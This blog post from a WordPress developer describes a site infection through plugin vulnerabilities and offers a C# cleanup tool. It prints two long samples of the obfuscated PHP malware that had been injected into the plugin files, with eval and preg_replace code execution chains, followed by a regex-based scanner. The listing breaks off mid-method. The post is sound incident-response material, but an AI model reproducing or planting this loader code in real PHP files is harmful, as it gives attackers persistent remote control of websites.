{ Dev Farm }

Web & Windows Development

WordPress and multiple malwares

5 Febbraio 2015 di max | 0 commenti

Thanks to MailPoet and Revolution Slider my websites run over multiple attaks.

I noticed problems mainly because, when I enter in the plugins’ list, a lot of errors like “Plugin ABC deactivated..” come out.
This because the plugin main file was not starting with its regular comment, but with the malevolent code.

A lot of files (1000+) was starting like this

!%x5c%x78242178}527}88:}334}467]452]88]5]48]32M3]317]445]212]445]43]321]464]284]364]6]234]342]6gP7L6M7]D4]275]D:M8]Df#<%x5)gpf{jt)!gj!<*2bd%x5c%x7825-#1GO%x5c%27pd%x5c%x78256#]y31]278]y3e]81]K78:56985:6197g:74985-rr.93eps)%x5c%x7825j>1<%x5c%x7825j=tj{fpg)%x5c%x7]37]278]225]241]334]368]322]3]364]6]225j>1<%x5c%x7825j=6[%x5c%x7825ww2!>#p#%x5c%x78]1%x5c%x782f20QUUI7jsv%x5c%x78257UFH25bss-%x5c%x7825r%x5c%x7878B%xx5c%x7825ww2)%x5c%x7825%52%x29%57%x65","%x65%166%x61%154%x28%151%x6d%160%x6c%157%x6c%x7827,*d%x5c%x7827,*ct%x5c%x7825)3of:opjudovg<~%x5c%x7824#L4]275L3]248L3P6L1M5]D2P4]D6#<%x5c%x78782fq%x5c%x7825>U<#16,4doj%x5c%x78256<%x5c%x787fw6*%x5c%x787f_*#fm5c%x7825:osvufs:~:<*9-1-r%x5c%x7825)s%x5c%x7825>%x5%x67%42%x2c%163%x74%162%x5f%163%x70%154%x69%164%50%x22%c%x7825bG9}:}.}-}!#*<%x5cbssbz)%x5c%x7824]25%x5c%x7824-%x5c%x7824-!%x5c%x7825%x5c%x7824-%,%x5c%x7825b:%x5c%x7825s:%%x21%50%x5c%x7825%x5c%x7878:!>#]yM#-#[#-#Y#-#D#-#W#-#C#-#OK)ftpmdXA6|7**197-2qj%x5c%x7825%x5c%x782f#)rrd%x5c%x#-#N#*%x5c%x7824%x5c%x782f%x5c%x78256>*4-1-bub)##Qtjw)#]82#-#!#-%x5c%x7825tmw)%x5c%x72f#00#W~!%x5c%x7825t2wy]#%x5c%x782fr%x5c%x7825%x5c%x782fh%x5c%x7825)n%x5c%x7825x5c%x7825:|:*r%x5c%x7825:-x5c%x785c%x5c%x7825j:^!%x5c%x782UTPI%x5c%x7860QUUI&e_SEx5c%x7825:<#64y]552]e7fsX%x5c%x7827u%x5c%x7825)7f8:|:7#6#)tutjyf%x5c%x786043927sfvr#%x5c%x785cq%x5c%x78257%x5c%x782f%x7825!-#1]#-bubE{h%x5c%x7825)tpqsutx7825<#762]67y]562]38y]572]48y]#>m%%x7825nfd>%x5c%x7825fdy!%x5c%x7825tdz)%x5c%x7825bb6*3qj%x5c%x78257>%x5c%x782272qj%x5c%x782y6g]273]y76]271]y7d]252]y74]256]y3%x5c%x7827,*b%x5c%x7827)fepdof.)fepdof.%x5c%xx5c%x7824*!|!%x5c%x7824-%5c%x7825w:!>!%x5c%x78246767~6Ew:Qb:Qc:W~!%x5c%x7825z!>2!{e%x5c%x7825)!>>%x5c%x7822!ftmbg)!gj<*#k#)usbut%x5cx7825=*h%x5c%x7825)m%x5c%x7825):fmji%x5c%x7878:<##:>:h%; function fjfgg($n){return chr(ord($n)-1);} @er#!#]y84]275]y83]248]y83]256]y81]x7824]y8%x5c%x7824-%x5c%x7824]26%x5c%x7824-%x5c%x78x7878{**#k#)tutjyf%x5c%x7860%x5c%x7878%x5c%x7822l:!}V;3q%x5c%x7825}U;x7825z>>2*!%x5c%x7825z>325h%x5c%x7825!5c%x7825)323ldfidk!~!<**qp%x5c%x78EB%x5c%x7860FUPNFS&d_SFSFGFS%x5c%x7860QUUI&%x782f%x5c%x7825%x5c%x7824-%x5c%x7824!>!fyqmpef)#%x5c%x7824*>}R;m%x7860cpV%x5c%x787f%x5c%x787f%x5c%x787f4]275]y83]273]y76]277#<%x5c%x7825t2w>#tmfV%x5c%x787f<*X&Z&S{ftmx5c%x7825b:>%x5c%x7825s:%x5c%x785c%x5c%x7825j:.2^72%x5c%x7824!#]y81]273]y76]258]y6g]273]y76]271]y7d]25)}.;%x5c%x7860UQPMSVD!-id%x5c%x7825)uqpuft%x5c%x7860msvd},;uqpuD6#<%x5c%x7825fdy>#]D4]273]D6P2L5P6]yc%x7860bj+upcotn+qsvmt+fmhpph#)zbssb!-#}#)fepmqnj!%x5c%x782f!#0#)idu9]252]y83]273]y72]282x5c%x782f!**#sfmcnbs+yfeobz+sfwjidsb%x5x7822#)fepmqyfA>2b%x5c%x7825!<%73", NULL); }bn%x5c%x7860hfsq)!sp!*#ojneb#-*f%x5c%x7825)sf%x5c%x72f14+9**-)1%x5c%x782f2986+7**^%x5c%x782f%x5c%x7825r%x_GMFT%x5c%x7860QIQ&f_jgk4%x5c%x7860{6~6>%x5c%x7822:ftmbg39*56A:>:)ppde>u%x5c%x7825V<#65,47R25,d7R17,67R37,#%x5c%x7fw6*%x5c%x787f_*#ujojRk3%x5c%x78]s]#)fepmqyf%x5c%x7827*&7-n%x5c%x7825)utjm6<%x5c%x787;hojepdoF.uofuopD#)sfebfI{*w%x5c%x7825)kV%x5c%pd%x5c%x78256!}%x5c%x7827;!>>>824!>!tus%x5c%x7860sf25!-uyfu%x5c%x7825)3of)fepdof%x5c%x786057ftbc%x5c%x787fg}{;#)tutjyf%x5c%x7860opjudovg)!gj!|!*msv%x5c%x7825)}k~~~!%x55c%x7824-%x5c%x7824y7%x5c%x7824-%x5c%x7824*!2p%x5c%x7825!*3>?*2b%x5c%x7825E{h%x5c%x7825)sutcvt)!gj!|!*bubE{h%x5c%x7825)j{hnp*qp%x5c%x7825-*.%x5c%x7825)euhA)3of>2bd%x5c%x7825!<5h%x5c%x7825%x5c%>%x5c%x782f7rfs%x5c%x78256<#o58]24]31#-%x5c%x7825tdz*Wsfuvso!%x5c%x7825bss%x5c%x785*#cd2bge56+99386c6f+9f5d816:+946:ce44#)zbssb!>!ssbnpecsboe))1%x5c%x782f35.)1%x5c%x78}%x5c%x7827;%x5c%x7825!<*#}_;#)323ldfid>}&;!osvufs}%x5c%x787f;!op5wN;#-Ez-1H*WCw*[!%x5c%x7825rN}%x7824-%x5c%x7824y4%x5c%x7824-%x5c%%x7825-qp%x5c%x7825)54l%x7827{**u%x5c%x7825-#jt0}Z;zbe!-#jt0*?]+^?]_%x5c%x785c}X%x5c%x7824!#]y762f#p#%x5c%x782f%x5c%x7825z!#-bubE{h%x5c%x7825)tpqsut>j%x5c%x7825!*9!%x5c%x7827!hmg%x5c%x7825)!134%x78%62%x35%165%x3a%146%x21%76#%x5c%x7827rfs%x5c%x78256~6<%x5c%x787fw6<*x5c%x7824-tusqpt)%x5c%x7825z-#:#*%x5c%x7824-%x5c%x77860MPT7-NBFSUT%x5c%x7860LDPT7-UFOJ%x5c%x7860GB)fubx5c%x7824%x5c%x785c%x5c%x7825jc%x78256|6.7eu{66~67<&w6<*&7-#o]s]o3#<%x5c%x7825yy>#]D6]281L1#%x5c%x782f#M5]DgP5]%x78256^#zsfvr#%x5c%x785cq%x55ttfsqnpdov{h19275j{hnpd19275fubmgoj{h1:|:*mmvo:>:fV%x5c%x787f<*XAZASV<*w%x5c%x7825c_UOFHB%x5c%x7860SFTV%x5c%x7860QUUI&b%x5c%x7825!|!*)37825kj:!>!#]y3d]51]y35]256]y76]72]y3d]51]y35]274]5c%x7825kj:-!OVMM*<(<%x5c%x78e%x5c%x78b%x5c%x7825ggg!>!>j%x5c%x7825!*72!%x5c%x7827!hmg%x5c%x7825)!gj!<2,*j%x5c%x7825-#1]dbqov>*ofmy%x5c%x7825)utjm!|!*5!%x5c%x7827!hmg%x5c%x7825)-#+I#)q%x5c%x7825:>:r%x5c%x7825:|:**t%x5c%x7825)m%x5c%fsdXA%x5c%x7827K6<%x5c%x787fw.[A%x5c%x7827&6<%x5c%x787fw6*%x5c%x787f_*#[k2%x5c%x7860{6:!}7;!}6;##}C%x7825>j%x5c%x7825!*3!%x5c%x7827!hmg%x5c%x7825!)!gj!<2,*j%x5c83]427]36]373P6]36]73]83]238M7]381]211M5]B%x5c%x7825iN}#-!tussfw)%x5c%x7825c*W%x5c%xsvufs!|ftmf!~<**9.-j%x5c%x7825-bubE{h%x5cx782f#0#%x5c%x782f*#npdc%x7825epnbss-%x5c%x7825r%x5c%x7878W~!Ypp2)%x5c%x7825zB%x#QwTW%x5c%x7825hIr%x5c%x785c1^-%x5c%x7825r%x5c%xsv}.;%x5c%x782f#%x5c%x782f#%x5c%x782f},;#-#}+;%x5c<*::::::-111112)eobs%x5c%x7860un>qp%x5c%x7825!|Z~!<##!>!2p%x5c%x]y74]273]y76]252]y85]256]y6g]257]y86]267]y74]275]y7:]268]y7f#OBSUOSVUFS,6<*msv%x5c%x78257-MSV,6<*)u60{666~6<&w6<%x5c%x787fw6*CW&)7gj6s%x5c%x7825<#462]47y]252]18y]#>q%x5c%7#@#7%x5c%x782f7^#iubq#%x5c%x785cq%x5c%x7825%x5c%x7827jsv%x5c7825}K;%x5c%x7860ufldpt}X;%x5c%x7860msvd}R;*msv%x5c%x7825)7gj6<**2qj%x5c%x7825)hopm3qjA)qj3hopmA%x5c%x78273qj%x5c%x78256hmg%x5c%x7825!<12>j%x5cx5c%x7825fdy)##-!#~<%x5c%x7825h00#*<%x5c%x7825nfd)##Qtpz)#]341]88M4P8iuhofm%x5c%x7825:-5ppde:4:|:**#ppde#)tutjyf%x5c%x786022)!gj}1~!<2p%x5c%x7825%x5c%x787f!~!<##!>!2p%x5c%x7825Z<^2%x5c%x7825)sutcvt)fubmgoj{hA!osvufs!~<3,j%x5cx7827Y%x5c%x78256<.msv%xqmbdf)%x5c%x7825%x5c5c%x7878<~!!%x5c%x7825s:N}#-%x5c%x7825o:W%x5c%x7825c:>1<%x5c%x7#]y81]273]y76]258]y6fw6*CW&)7gj6<*K)ftpmdXA6~6%x5c%x782f7&6|7**111127-K)eb23zbek!~!b%x5c%x7825Z<#opo#>b%x5c%x7825!*7,18R#>q%x5c%x7825V<*#fopoV!}_;gvc%x5c%x7825}&;ftmbg}%x5c%x787f;!osvufs}w;*%x5c%x787f!>>%x5c%xALS["%x61%156%x75%156%x61"])))) { $GLOBALS["%x61%156%x75%156%x61"]=13g]61]y3f]63]y3:]68]y76#<%x5c%x78e%x5c%x78b%xfw6*CWtfs%x5c%x7825)7gj6<*id%x5c%x7825)ftpmdR6<*id%x5c%x7!%x5c%x782400~:!%x5c%x7824Ypp3)%x5c%x7825c;!>>!}W;utpi}Y;tuofuopd%x5c%x7860ufh%x5c%x7860fmjg}[;ldpt%x5c%x825%x5c%x7824-%x5c%x7824*j%x5c%x7825!<**3-j%x5c%x7856<%x5c%x787fw6*%x5c%x787f_*#fubfsdXk5%x5c%x7860{66~6<&w6<%x5c%x787c%x7825yy)#}#-#%x5c%x7824-%7825!|!*!***b%x5c%x7825)sf%x5c%x7878pmpusut!-#j0#!%c%x7827pd%x5c%x78256n%x5c%x7825<#372]58y]472]37y]6265]y72]254]y76#<%x5c%x7825tmw!>!#]y8##>>X)!gjZ<#opo#>b%x5c%x7825!**X)ufttj%x5c%x7822)gj!|!*nbsbq%x]65]D8]86]y31]278]y3f]51L3]84]y31M6]y3e]81#%x5c%x782f#7e:55946-T-%x5c%x7825bT-%x5c%x7825hW~%%x5c%x78257-K)fujs%x5c%x7878X6<#o]o]Y%x5c%x78257;utpI#7825b:>11<%x5c%x7825j:=tj{fpg)%x5c%x782572]K9]78]K5]53]Kc#<%x5c%x7825tpz!>!#]D6M7]K782f#00;quui#>.%x5c%x7825!<***f%x5c%x7827,*e%x5%x5c%x787f!tussfw)%x5c%x7825zW%x5c%x7825h>EzH,2W%x5c%x7824%x5c%x78223}!+!<+{e%x5c%x7825+*]277]y72]265]y39]274]y85]273]1]y33]68]y34]68]y33]65]y31]53]y6d]281]y43]78]y33]65]y31]55]y85]25-bubE{h%x5c%x7825)sutcvt-#w#)l5c%x7860ftsbqA7>q%x5c%x782w%x5c%x7860TW~%x5c%x7824<%x5c%x78e%x5c%x78b%x5c%x7825mm)%x5c%x78225G]y6d]281Ld]245]K2]285]Ke]53Ld]53]Kc]55Ld]55#*<%x5x5c%x7825>2q%x5c%x7825<#g6R85,67R382]y76]62]y3:]84#-!OVMM*<%x22%51%x29%51%x295c%x7860hA%x5c%x7827s:*<%x5c%x7825j:,,Bjg!)%x5c%x7825j:>>1*!%x5c%x7825b:>1

Others (50+) was starting like this, and other random vars

^#zsfvr#%x5c%x785cq%x5c%-uyfu%x5c%x7825)3of)fepdof%x5c%x786057ftbc%x)s%x5c%x7825>%x5c%x782fh%x5c%x7825:<**#57]38y]47]67y]37]88y]27]28y]#%xx5c%x78256<*Y%x5c%x78%x7824Ypp3)%x5c%x7825cB%x5c%x7825iN}#-!tuss%x7825i%x5c%x785c2^1<%x5c%%x5c%x7825%x5c%x787f!b%x5c%x7825Z<#ox5c%x78e%x5c%x78b%x5c%x7825m34]68]y33]65]y31]53]y6d]281]y43]78]y33]65]y31]55]y85]82]y76]62]y3:]84]6]234]342]58]24]31#-%n fjfgg($n){return chr(ord($n78242178}527}88:}334}482561<%x5c%x7825b:>11<%x5c%x7825j:=t275]D:M8]Df#<%x5c%x7825tdz>#L4]275L3]248L3P6L1c%x7827pd%x5c%x78256%x5c%x7825fdy!%x5827&6<.fmjgA%x5c%x7827doj%x5c%x78256<%x5c%x787fw6*%x00#*<%x5c%x7825nfd)##Qtpz)#]341]88M4P8]37]278]225]241]334]368])!gj!<2,*j%x5c%x7825!5c%x7878%x5c%x7822l:!}V;3q%x5c%x7825}U;y]}R;278X6<#o]o]Y%x5c%x7825)fepmqnj!%x5c%x782f!#0#)ix7825j=tj{fpg)%x5c%x7qov>*ofmy%x5c%x7825)utjm!|!*5!%x5c%x7825-#1]#-bubE{h%x5c%x7825)tpqsut>j%x5c%x7825!*9!%x5c%x75c%x782fr%x5c%x7825%x5c%x7824-%x5c%x7824-!%x5c%x7825%x5c%x7824-%x5c%x7824*!dovg}{;#)tutjyf%x5c%x7860opjudovg)!gj!|!*4-%x5c%x7824<%x5c%x7825j,,*!|%x5c%x7824-%x5c%x7824gvodujpo!%x5c%xx5c%x7827!hmg%x5c%x7825)!gj!|!*1?hmg%x5c%x7825)!gj!<**2-4-bubE{h%x5c%xx7825)uqpuft%x5c%x7860msvd},;uqpuft%x5c%x7860msvd}+;!>!}%x5c%xdof.%x5c%x782f#@#%x5c%x782fqp%x5c%x7825>5h%x5c%x7825!<*::::::-11111%x5c%x785c%x5c%x7825j:]#>m%x5c%x7825:|:*r%x5c%x7825%x7860{6~6#]D4]273]D6P2L5P6]y6gP7L6M7]D4]hofm%x5c%x7825:-5ppde:4:|:**#ppde#)tutjyf%%x5c%x7825<#372]58y]472]37y]672]48y]#>s%x5c%x7821y]c9y]g2y]#>>*4-1-bubE{h%x5c%x7825)sutcvt)!gj!|!*bubE{h%x5c%x7825)j{hc_UOFHB%x5c%x7860SFTV%x5c%x7860QUUI&b%x5c%x7825!|!*)323zbek!~!!bssbz)%x5c%x7824]25%y35]256]y76]72]y3d]51]y35]274]y4:]82]y3:]62]y4c#!%x5c}^Ew:Qb:Qc:W~!%x5c%x7825x5c%x7825tdz*Wsfuvso!%x5c%x71]278]y3e]81]K78:56985:6197g:74985-rr.93e:5597f-s.973:8297f:]y3f]51L3]84]y31M6]y3e]81#%x5c%x782f#7%x78256<#o]1%x5c%x782f20QUUI7jx782f#00#W~!%x5c%x7825t2w)##Qtjw)#]82#-#!#-%x5c%x7825tmw)%x5c%78b%x5c%x7825ggg!>!#]y81]273]y76]258]jR%x5c%x7827id%x5c%x78256<%x5c%x787%x5c%x787f<*XAZASV<*w%x825}K;%x5c%x7860ufldpt}X;%x5c%x7860msvd}R;*msv%x5c%x7825)}c%x782f#p#%x5c%x782f%x5c%x7825z!#]y81]5c%x787f!|!*uyfu%x5c%x7827k:!ftmf!}Z;^nbsbq%x5c%x7825%x5c%x785c87fw6*3qj%x5c%x78257>%x5c%x782272qj%x5c%x7b%x5c%x7825!>!2p%x5c%x7825!*3>?*2b%x5c%x7825)gpf%x5c%x7825V%x5c%x7827{ftmfV%x5c%x787f<*X&Z&S{ftmfV5297e:56-%x5c%x7878r.985:52985-t.98]K4]65]D8]86]y31]2782p%x5c%x7825!|!*!***b%x5c%x7825O#-#N#*%x5c%x7824%x5c%x782f%x5c%x7825kj:-!OVMM*<(<%x5c%x78e%x5c%x22:ftmbg39*56A:>:8:|:7#6#)tutjy257-C)fepmqnjA%x5c%x77824-%x5c%x7824y7%x5c%x78m)%x5c%x7825%x5c%x7878:-!%x5c%x7825tzw%x5c%x782f%x5c%x782|!%x5c%x7824-%x5c%x7824%x5x78246767~6hmg%x5c%x7825!<12>j%x5c%x7825!|!*#9-#1]#-bubE{h%x5c%x7825)tpqsut>j%x5c%x7825!*72!%x5c%x7827!hmg827!hmg%x5c%x7825)!gj!~:iuw;*%x5c%x787f!>>%x5c%x7822!pd%x5c%x7825)!gj}Z;h!opjuSFWSFT%x5c%x7860%x5c%x7825}X;!sp!*#opo#c%x785c%x5c%x7825j^%x5c%x7824-%x5c%x7824tvctus)%x5c%x782dubn%x5c%x7860hfsq)!sp!*#ojneb#-*f%x5c%x7825)sf%x5c%x7878pmpupd%x5c%x78256!%x5c%c%x7825tjw!>!#]y84]275]y83]248]y83]256]y81]2w6<*K)ftpmdXA6|7**197-2qj%x5c%x78257-K)udfoopdXA%x5c%x7822)7gjc%157%x64%145%x28%141%x72%162%x61%171%x5f%155%x61%y6g]273]y76]271]y7d]252]y74]256]y39]252]y83]273]y72]282#>1*!%x5c%x782)rrd%x5c%x782f#00;quui#>.%x5c%x7825!<***f%x5c%x7827,*e%x5cd%x5c%x7825)Rb%x5c%x7825))!gj!<*#cd2bge56+99386c6f+9f5d816x7825ww2)%x5c%x7825w%x5c%x7860TW~%x5c%x7824<%#-#H#-#I#-#K#-#L#-#M#-#[#-#Y#-#D#-#W#-#C#-#)-1);} @error_reporting(0); preg_replace("%x2f%50%x2e%52%x29%57%x7fmji%x5c%x7878621<%x5cx5c%x7825:osvufs:~928>>%x5c%x780gvodujpo)##-!#~<#%x5c%x782f%x5c%x7825%x5c%x782323ldfidk!~!<**qp%x5c%x7825!7;utpI#7>%x5c%x782f7rfs%x5c7fw6*CW&)7gj6<.[A%x5c%6<*127-UVPFNJU,6<*27-SFGTOBSUOSVUFS,6<*msv%x5c%x78257-MSV,6<*)ujoc%x7860LDPT7-UFOJ%x5c%x7860GB)fubfsdXA%x5c%x7827K6<%x5c%x7{jt)!gj!<*2bd%x5c%x7825-#1GO%f!**#sfmcnbs+yfeobz+sfwjidsb%x5c%x%x7860hA%x5c%x7827pd%x5c%x7%x7827,*d%x5c%x7827,*c%x5c%x7827,*b%x5c%x7827)fepdof.)fep7860hA%x5c%x7827pd%x5c%x78256u%x5c%x7825V<#65,47R25,d7R17,67R37,#%x5c%x782fq%xx5c%x78604%x5c%x78223}!+!<+{e%x5c%x7825+*!*+fepdfe{h+{d%x5c%x7825npd!opjudovg!|!**#j{hnpd#)tutjyf%x5c%x7860opjudovg%sv%x5c%x78257UFH#%x5c%x7827rfs%x5c%x78256~6<%x5c%x787f825w6Z6<.4%x5c%x7860hA%x5c%x7827c%x7825-#jt0}Z;0]=]0#)2!tus%x5c%x7860sfqmbdf)%x5c%x7825%x5c%x25h>EzH,2W%x5c%x7825wN;#-Ez-1H*WCw*825bss%x5c%x785csboe))1%x5c%x782f35.)1%x5c%x782f14+9**-)1%x7825Z<^2%x5c%x785c2%x7825j=6[%x5c%x7825ww2!>#p#%x525>j%x5c%x7825!*3!%x5c%x7827!hmg%x5c%x7825!7825)sutcvt)fubmgoj{hA!osvufs!~<3,j%x5c%x78)+opjudovg+)!gj+{e%x5c%x7825!osvufs!*!+A!>!{e%x5c%x7825)!>>%x^-%x5c%x7825hOh%x5c%%x5c%x7825):fmji%x5c%x7878:<##:>:h%x5c%x7825:<#64y]552]e7y]#>n#)fepmqyf%x5c%x7827*&7-n%x5c%x7825)utjm6<%860{6:!}7;!}6;##}C;!>>!x5c%x7822)!gj}1~!<2p%25r%x5c%x7878<~!!%x5c%x7825s:N}#-%x5c%x7825o%x5c%x7825)!gj!<2,*j%7825-bubE{h%x5c%x7825)sutcvt-#w#)ldbM5]D2P4]D6#<%x5c%x7825G]y6d]281Ld]245]K2]285]Ke]53Ld]53]Kc]x5c%x7825V<*#fopoV;hojepdoF.uofuopD#)sfebfI{*w%x5c%x7825)kV%x5c%x77;%x5c%x7825!<*#}_;#)323ldfid>}&;!osvufs}%x5c%x787f;!opjudovg}k~~9{d%55Ld]55#*<%x5c%x7825bG7824-tusqpt)%x5c%x7825z-#:#*%x5c%x7824-%x5c%x7824!>:+946:ce44#)zbssb!>!ssbnpex7825tww**WYsboepn)%x5c)323zbe!-#jt0*?]+^?]_%x5c%x785c}X%x5c%x7824)sf%x5c%x7878pmpusut!-#j0#!%x5c%x782k#)usbut%x5c%x7860cpV%x5c%x787f%x5c%x787f%x5c%x787f%x5c%x787f>}R;msv}.;%x5c%x782f#%x5c%x782f#%x5c%x782f},;my%x5c%x7825,3,j%x5c%x7825>j%x5c%x7825!<**3-j%x5c%xx782400~:q%x5c%x78256<%x5c%x787fwfs%x5c%x78256<*17-SFEBFI,878{**#k#)tutjyf%x5c%x7860%x7>%x5c%x782f7&6|7**111127-K)ebfsX%x5c%x7827u%x5c%x7825)CW&)7gj6<*doj%x5c%x785%x5c%x7824-%x5c%x7824b!>!%x5c%x7825yy)#}#-#%x5c%x7824-%x5c%x%x7825bss-%x5c%x7825r%x5c%x7878B%x5c%x7825h>#]y35c%x7822!ftmbg)!gj<*#x78257**^#zsfvr#%x5c%x785cq%x5c%x7825)ufttj%x5c%x7822)gj6<^#Y#%x5c%x73of>2bd%x5c%x7825!<5h%x5c%x7825%x5c%x782f#0#%x5c%x782f*#npd%x5c%x782f#x5c%x7825%x5c%x787f!~!<##!>!2p%x5c%4-%x5c%x7824!>!fyqmpef)#%x5c%x7824*!#]y3d]51]5b:>1%x5c%x782f+*0f(-!#]y76]277]y72]265]y39]271]y83]256]y78]248]%x7825>2q%x5c%x7825<#g6R85,67R37,18R#>q%5c%x7825:>:r%x5c%x7825:|:**t%x5c%x7825)m%x5c%x7825=*h%x5c%x7825)mx7824-%x5c%x7824]y8%x5c%x7824-%x5c%x7824]26%x5c%x782273]y76]258]y6g]273]y7666~67<&w6<*&7-#o]s]o]s]825s:%x5c%x785c%x5c%x7825j:.2^,%x5c%x7825b:%x5c%x7825s:57%x5c%x782f7#@#7%x5c%x782f7^#iubq#%x5c%x785cq%x5c%x7825%x5c%x782322]3]364]6]283]427]36]373P6]36]73]83]238po#>b%x5c%x7825!*##>>X)!gjZ<#opo#>b%x5c%x7825!**X)y83]256]y81]265]y72]254]y76]61]y33]68]y[!%x5c%x7825rN}#QwTW%x5c%x7825hIr%x5c%x785c1^-%x5c%x7825r%x5c%x785c27827;!>>>!}_;gvc%x5c%x7825}&;ftmbg}%x5c%x787f;!osvufs}e:55946-tr.984:75983:48984:71]K9]77]D4]82]K6]72]K9]78]K5]53]Kc825zB%x5c%x7825z>!tussfw)%x5c%x7825zW%x5c%x7885cq%x5c%x7825%x5c%x7827Y%x5c%x78256<.msv#-#}+;%x5c%x7825-qp%x5c%x7825)54l}%x5c%x782%x21%76%x21%50%x5c%x7825%x5c%x7878:!>#]y3g]61]y3x5c%x787fw6*CW&)7gj6<*K)ftpmdXA6~6!%x5c65]y72]254]y76#<%x5c%x7825tmw!>!#]y84]275]y83]275c%x7825>U<#16,47R57,27R66,#%x5c%x782fq%x5cx5c%x782fh%x5c%x7825)GLOBALS["%x61%156%x75%156%x61"])))) { $GLOBALS[")7gj6<*id%x5c%x7825)ftpmdR6<*id%x5c%x7825)dfyfR%x5c%x7827t4)#P#-#Q#-#B#-#T#-#E#-#G2)eobs%x5c%x7860un>qp%x5c%x7825!|Z~!<##!>!:-t%x5c%x7825)3of:opjudovg<~%x5c%x7824!%x5c%x.;%x5c%x7860UQPMSVD!-id%x5c%msv%x5c%x7825)}k~~~!#]D6M7]K3#<%x5c%x7825yy>#]D6]281L1#%x5c%5<#462]47y]252]18y]#>q%x5c%x7825<#762]67y]562]38y]572]48yc%x7825z>>2*!%x5c%x7825z>32#]y74]273]y76]252]y85]256]y6g]257]f]63]y3:]68]y76#<%x5c%x78e%x5c%x78b%x5c%x7825w:!>!%x5c%x5c%x7822#)fepmqyfA>2b%x5c%x7825!<*qp%x5c%x7825-*.%x5c%x7825)euhA)6<*QDU%x5c%x7860MPT7-NBFSUT%x525)fnbozcYufhA%x5c%x78272qj%x5c%x78256<^#zsfvr#%x5c%x785cq%x5c%x782/(.*)/epreg_replacedjblbnsdwy'; $qzzwqleqqo = explode(chr((273-229)),'1058,68,9328,48,501,33,832,29,5353,65,4624,40,4856,50,40,50,9096,57,9002,48,9888,55,3941,41,5932,39,6204,32,4587,37,5848,27,883,39,1361,52,8401,23,6670,42,9050,46,7695,55,5418,61,1654,21,5613,27,3108,30,6150,54,4794,62,10009,30,5727,58,3490,42,5003,56,386,21,10039,67,8494,65,230,42,7901,69,8918,41,7600,42,942,57,7750,21,3812,21,1474,52,1037,21,2244,55,9376,58,7642,25,5662,65,3237,35,561,53,5640,22,4041,44,6712,23,3982,59,3295,58,9561,28,2064,62,8757,54,4379,52,1888,41,9589,32,999,38,6484,43,6441,43,1588,21,4136,60,6800,21,1752,61,4196,26,7436,51,6821,36,1721,31,1994,70,4085,51,2638,70,6099,51,6735,21,8040,35,6390,20,3532,48,5785,29,9943,66,7970,70,5149,58,5875,57,2126,67,9458,42,3685,31,7232,36,5814,34,2299,38,1675,25,4526,61,5059,25,5207,58,7124,26,2447,38,181,49,2708,64,674,39,8600,50,4222,38,5585,28,272,44,3427,63,4431,39,7390,46,8959,43,6982,69,5507,31,3781,31,4311,68,2548,42,6034,65,6527,61,7880,21,7268,63,3580,50,3272,23,5971,63,9264,43,8221,40,6916,66,7667,28,1609,45,1184,65,4260,51,6236,23,534,27,7547,53,7173,59,4664,35,4906,61,4750,44,9216,48,9829,59,4699,51,7487,60,316,70,1813,20,9307,21,922,20,8261,65,6608,62,2590,48,9719,57,2215,29,9500,61,861,22,3392,35,8378,23,2794,59,1833,55,3915,26,4470,56,7771,61,7073,51,6259,38,2772,22,8326,52,1929,65,3833,25,614,60,1700,21,137,44,5538,47,8075,62,2853,70,407,43,9153,63,450,51,90,47,7331,59,8873,45,6297,35,8689,68,6588,20,3138,62,7150,23,7832,48,3010,60,3630,55,3070,38,8811,62,9661,58,2485,63,1315,46,6857,59,7051,22,1413,61,9621,40,2404,43,1526,62,8559,41,2337,67,810,22,2982,28,6332,58,4967,36,6756,44,1249,66,5084,65,8137,32,8424,70,2193,22,2924,58,5479,28,6410,31,3353,39,9776,53,5265,45,713,28,3858,57,9434,24,5310,43,3716,65,3200,37,1126,58,8169,52,8650,39,741,69,0,40,2923,1'); $ifjhyarlhw=substr($ghkpbkldao,(36181-26075),(32-25)); if (!function_exists('wpatekrfkn')) { function wpatekrfkn($lvejcmnday, $tqebttflow) { $wzjddmebme = NULL; for($bkbmnonwwh=0;$bkbmnonwwh<(sizeof($lvejcmnday)/2);$bkbmnonwwh++) { $wzjddmebme .= substr($tqebttflow, $lvejcmnday[($bkbmnonwwh*2)],$lvejcmnday[($bkbmnonwwh*2)+1]); } return $wzjddmebme; };} $szerhjoqyk="\x20\57\x2a\40\x64\143\x63\141\x70\161\x7a\146\x6c\165\x20\52\x2f\40\x65\166\x61\154\x28\163\x74\162\x5f\162\x65\160\x6c\141\x63\145\x28\143\x68\162\x28\50\x32\64\x30\55\x32\60\x33\51\x29\54\x20\143\x68\162\x28\50\x36\64\x32\55\x35\65\x30\51\x29\54\x20\167\x70\141\x74\145\x6b\162\x66\153\x6e\50\x24\161\x7a\172\x77\161\x6c\145\x71\161\x6f\54\x24\147\x68\153\x70\142\x6b\154\x64\141\x6f\51\x29\51\x3b\40\x2f\52\x20\150\x78\153\x69\142\x74\156\x74\164\x64\40\x2a\57\x20"; $eehkaejhtl=substr($ghkpbkldao,(31400-21287),(65-53)); $eehkaejhtl($ifjhyarlhw, $szerhjoqyk, NULL); $eehkaejhtl=$szerhjoqyk; $eehkaejhtl=(651-530); $ghkpbkldao=$eehkaejhtl-1; ?>

Tired of this haks I wrote a small .cs colsole for cleaning this files.
Other websites suggest a .sh script but I’m a Windows user and I’d use its tools.

Feel free to use/edit/whatever this code:


using System;
using System.Text;
using System.IO;
using System.Text.RegularExpressions;

namespace ConsoleApplicationCleanWordpress
{
    class Program
    {

        static Regex re = new Regex(@"^<\?php\sif\(\!isset\(\$GLOBALS\[" + "\"" + @"\\x61\\156\\x75\\156\\x61" + "\"" + @"\]\)\)\s.*\s\?>");

        //static Regex re = new Regex(@"^<\?php.*(\#\-\!OVMM\*\<%x22%51%x29%51%x29%73"", NULL\);).*\s\?>");

        static int count = 0;

        static void Main(string[] args)
        {
            cleanFolder(@"C:\Users\max\Desktop\public_html");

            Console.WriteLine(count + " infecetd files.");
            Console.WriteLine("THE END!");
            Console.ReadLine();

        }

        private static void cleanFolder(string folder)
        {
            var di = new DirectoryInfo(folder);

            foreach (var subfolder in di.GetDirectories())
                cleanFolder(subfolder.FullName);

            /*
            foreach (var file in di.GetFiles())
            {
                if (file.FullName.ToLower().EndsWith(".php"))
                    cleanFile(file);
                else
                    file.Delete(); // don't need to upload it anymore (css, js, big files, etc)
            }
            */

            foreach (var file in di.GetFiles("*.php"))
                cleanFile(file);

        }

        private static void cleanFile(FileInfo file)
        {
            var content = File.ReadAllText(file.FullName);
            if (re.IsMatch(content))
            {
                var orig = file.FullName;
